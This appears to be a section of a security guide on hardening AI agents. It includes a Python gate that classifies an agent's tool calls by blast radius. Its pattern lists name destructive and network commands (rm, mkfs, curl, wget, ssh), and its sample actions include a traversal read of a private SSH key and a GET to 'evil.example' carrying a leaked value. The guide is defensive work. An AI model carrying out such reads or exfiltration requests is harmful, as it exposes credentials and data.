Securing the AI Collaborator
In one line: The agent is a powerful but exploitable actor — treat the content it reads as untrusted, keep secrets out of its context, vet the tools it runs, and tie auto-approval to blast radius.
The earlier sections harden what the AI builds. This section treats the AI itself as part of your threat surface and hardens it accordingly: an agent that reads the open web, runs third-party tools, holds credentials in its context window, and can take destructive or outward-facing actions. Each rule below names the mechanism that enforces it, or is marked "recommended (not yet enforced)". An aspirational rule that no mechanism backs is decoration, which is the same standard the rest of the methodology holds itself to.
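Of the four rules in the one-line summary, tying auto-approval to blast radius is the one that most needs a concrete shape. The gate below is an added illustration, not the methodology's own code: the tool names (read_file, write_file, shell, http_request), the workspace path, the four tiers, the command patterns and the host allowlist are all assumptions chosen for the example. It classifies each proposed tool call by how far its effects can reach, auto-approves only up to a configured tier, and treats any tool it does not recognise as outward-facing so the policy fails closed.

```python
"""Blast-radius gate for an agent's tool calls.

Added illustration, not the methodology's own code: the tool names, argument
shapes, tiers, regex patterns and the workspace path are all assumptions.
"""
import posixpath
import re
from dataclasses import dataclass, field
from enum import IntEnum
from urllib.parse import urlparse


class Radius(IntEnum):
    """Blast radius of a proposed action, ordered from smallest to largest."""
    READ_WORKSPACE = 0          # read-only, confined to the workspace or allowlisted docs hosts
    WRITE_WORKSPACE = 1         # mutates workspace files; recoverable from version control
    OUTSIDE_OR_DESTRUCTIVE = 2  # touches paths outside the workspace, deletes, or rewrites history
    OUTWARD = 3                 # leaves the machine: pushes, publishes, uploads, unknown hosts


@dataclass
class Action:
    tool: str                                # assumed tools: read_file, write_file, shell, http_request
    args: dict = field(default_factory=dict)


@dataclass
class Decision:
    radius: Radius
    auto_approved: bool
    reason: str


WORKSPACE = "/home/dev/project"                   # assumed workspace root
READ_ALLOWLIST = {"docs.python.org", "pypi.org"}  # assumed hosts safe to fetch unattended

# Assumed command patterns; a real deployment would derive these from its own tool registry.
DESTRUCTIVE = [r"\brm\b", r"git\s+push\b.*--force", r"git\s+reset\s+--hard", r"\bdrop\s+table\b", r"\bmkfs\b"]
OUTWARD = [r"\bcurl\b", r"\bwget\b", r"\bssh\b", r"\bscp\b", r"git\s+push\b", r"npm\s+publish\b"]


def inside_workspace(path: str) -> bool:
    """Resolve `path` (relative paths are taken relative to the workspace) and check containment.
    normpath collapses `..`, so a traversal such as ../../.ssh/id_rsa is caught; the trailing
    slash in the prefix test stops /home/dev/project2 from passing as /home/dev/project."""
    full = posixpath.normpath(posixpath.join(WORKSPACE, path))
    return full == WORKSPACE or full.startswith(WORKSPACE + "/")


def classify(action: Action) -> Radius:
    """Map an action onto a Radius tier. Anything unrecognised is OUTWARD (fail closed)."""
    a = action.args
    if action.tool == "read_file":
        return Radius.READ_WORKSPACE if inside_workspace(a["path"]) else Radius.OUTSIDE_OR_DESTRUCTIVE
    if action.tool == "write_file":
        return Radius.WRITE_WORKSPACE if inside_workspace(a["path"]) else Radius.OUTSIDE_OR_DESTRUCTIVE
    if action.tool == "shell":
        cmd = a["cmd"]
        radius = Radius.WRITE_WORKSPACE  # a shell command may write; never treat it as read-only
        if any(re.search(p, cmd) for p in DESTRUCTIVE):
            radius = Radius.OUTSIDE_OR_DESTRUCTIVE
        if any(re.search(p, cmd) for p in OUTWARD):
            radius = Radius.OUTWARD      # highest matching tier wins, e.g. git push --force
        return radius
    if action.tool == "http_request":
        host = urlparse(a["url"]).hostname or ""
        # A GET to an arbitrary host is still an exfiltration channel (secrets in the query
        # string), so only GETs to allowlisted hosts count as reads.
        if a.get("method", "GET").upper() == "GET" and host in READ_ALLOWLIST:
            return Radius.READ_WORKSPACE
        return Radius.OUTWARD
    return Radius.OUTWARD


def decide(action: Action, auto_approve_up_to: Radius = Radius.WRITE_WORKSPACE) -> Decision:
    """Auto-approve only actions whose blast radius is at or below the configured tier."""
    radius = classify(action)
    ok = radius <= auto_approve_up_to
    return Decision(radius, ok, f"{action.tool}: {radius.name}, {'auto' if ok else 'needs human approval'}")


if __name__ == "__main__":
    # Constructed sample actions, the kind an agent might propose mid-task.
    for act in [Action("read_file", {"path": "src/main.py"}),
                Action("read_file", {"path": "../../.ssh/id_rsa"}),
                Action("shell", {"cmd": "pytest -q"}),
                Action("shell", {"cmd": "git push --force origin main"}),
                Action("http_request", {"method": "GET", "url": "https://evil.example/?k=leaked"})]:
        print(decide(act).reason)
```

The threshold is the policy knob: raising `auto_approve_up_to` to `OUTSIDE_OR_DESTRUCTIVE` lets a sandboxed CI agent delete build output unattended, while a session with real credentials in context should stay at `WRITE_WORKSPACE` or lower. Whatever the threshold, the classifier must never return a tier it cannot justify from the action's arguments, which is why an unknown tool and a non-allowlisted host both land in the top tier.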